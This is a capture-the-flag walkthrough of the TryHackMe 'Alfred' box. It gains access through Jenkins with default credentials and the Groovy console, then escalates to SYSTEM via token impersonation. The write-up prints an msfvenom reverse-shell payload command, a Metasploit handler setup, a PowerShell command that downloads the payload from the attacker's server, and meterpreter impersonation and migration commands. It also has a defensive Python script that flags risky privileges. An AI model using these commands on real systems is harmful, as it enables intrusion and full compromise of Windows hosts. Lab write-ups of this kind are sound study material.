Alfred
An easy Windows box from TryHackMe: get initial access through the Jenkins Groovy script console, then abuse the SeImpersonatePrivilege user right to get SYSTEM.
Recon
Found a Jenkins instance running on the server; log in with the default creds
admin:admin
Exploitation
The Jenkins script console can execute Groovy scripts; leverage that to get a reverse shell on the system.
Create a meterpreter reverse shell payload with msfvenom (replace the bracketed placeholders with your own values)
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
Set up a handler in Metasploit with
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run
Set up a Python HTTP server on the attacking machine, then download the reverse shell to the target using PowerShell with
powershell "(New-Object System.Net.WebClient).DownloadFile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Then execute the downloaded .exe on the target to get a meterpreter shell.
Running
whoami /priv
shows that SeImpersonatePrivilege is enabled.
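From the defensive side, the quickest way to spot service accounts exposed to this class of escalation is to parse whoami /priv output and flag the dangerous rights. The following is an added example, not part of the original writeup; the sample output and the high-risk privilege list are constructed here for illustration.

```python
import re
from typing import Dict, List

# Token privileges that routinely let a compromised service account reach
# SYSTEM (constructed list of well-known Windows rights; tune to your policy).
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}

# Constructed sample, mimicking the table layout printed by `whoami /priv`.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSecurityPrivilege           Manage auditing and security log          Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
"""

# One table row: privilege name, free-text description, then the State column.
ROW_RE = re.compile(r"^(Se\w+)\s+.*\s(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> Dict[str, bool]:
    """Map each privilege in `whoami /priv` output to True if it is Enabled."""
    privs: Dict[str, bool] = {}
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def risky_privileges(privs: Dict[str, bool]) -> List[str]:
    """Return the enabled privileges that warrant review, sorted by name."""
    return sorted(p for p, on in privs.items() if on and p in HIGH_RISK_PRIVILEGES)


if __name__ == "__main__":
    flagged = risky_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV))
    print("review these enabled rights:", ", ".join(flagged) or "none")
```

Run it against `whoami /priv` captured from the account a service like Jenkins runs as; any flagged right is a reason to move the service to a dedicated low-privilege account and to lock down who can reach the script console.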
In the meterpreter session, load the incognito module with
load incognito
Then check which tokens can be impersonated with
list_tokens -g
and see that the BUILTIN\Administrators token is available.
Impersonate the Administrators token with
impersonate_token "BUILTIN\Administrators"
Running getuid now shows NT AUTHORITY\SYSTEM.
You now hold a higher privileged token but still need to migrate into a higher privileged process; the safest process to migrate to is services.exe. Migrate the meterpreter session with
migrate PID_OF_services.exe
and you now have full SYSTEM privileges.